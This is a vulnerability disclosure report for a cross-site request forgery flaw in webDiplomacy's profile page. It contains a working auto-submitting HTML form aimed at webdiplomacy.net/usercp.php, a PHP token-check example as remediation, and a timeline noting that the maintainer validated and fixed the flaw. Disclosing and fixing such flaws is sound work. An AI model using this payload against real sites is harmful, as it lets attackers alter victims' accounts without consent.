Cross-Site Request Forgery (CSRF) in kestasjk/webdiplomacy

Valid

Reported on Jul 23rd 2021


✍️ Description

CSRF bug to change user profile

🕵️‍♂️ Proof of Concept

I see there is no CSRF token check when updating the user profile. Save the HTML code below in an HTML file and host this file. Now send this file's link to the victim; when the victim opens the link, their profile information will be changed.

<form action="https://webdiplomacy.net/usercp.php" method="post" id="myForm">
  <input type="hidden" name="userForm[comment]" value="yyyy">
  <input type="submit" value="Submit">
</form>
<script>
  document.getElementById("myForm").submit()
</script>

💥 Impact

Attacker can change the victim's profile information when they open a malicious link.
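The kind of synchronizer-token check the report says the profile form lacks, written as an added illustration rather than webDiplomacy's own code or the merged fix; the `usercp.php` target and the `userForm[comment]` field come from the report, the token field name and `save_profile_comment` helper are assumed:

```php
<?php
// Added illustration (not webDiplomacy's code): synchronizer-token protection
// for a profile-update handler shaped like the usercp.php form in the report.
declare(strict_types=1);

// Defence in depth (PHP >= 7.3): keep the session cookie off cross-site POSTs.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// Issue one unpredictable token per session and keep it server-side.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison; a missing or wrong token fails closed.
function csrf_valid(?string $submitted): bool
{
    return is_string($submitted)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST') {
    // A form auto-submitted from another origin (as in the PoC) cannot read
    // the token out of the victim's page, so the request is rejected here.
    if (!csrf_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    $comment = (string)($_POST['userForm']['comment'] ?? '');
    // save_profile_comment($comment); // assumed application function
    echo 'Profile updated';
    exit;
}

// GET: render the form with the token embedded as a hidden field.
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
echo <<<HTML
<form action="usercp.php" method="post">
  <input type="hidden" name="csrf_token" value="{$token}">
  <input type="text" name="userForm[comment]">
  <input type="submit" value="Save">
</form>
HTML;
```

The same token must be checked on every state-changing handler, not only this one; a GET endpoint that changes state would bypass it entirely.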

We have contacted a member of the kestasjk/webdiplomacy team and are waiting to hear back 4 months ago
Kestas "Chris" Kuliukas validated this vulnerability 4 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Kestas "Chris" Kuliukas confirmed that a fix has been merged on e1b873 4 months ago
Kestas "Chris" Kuliukas has been awarded the fix bounty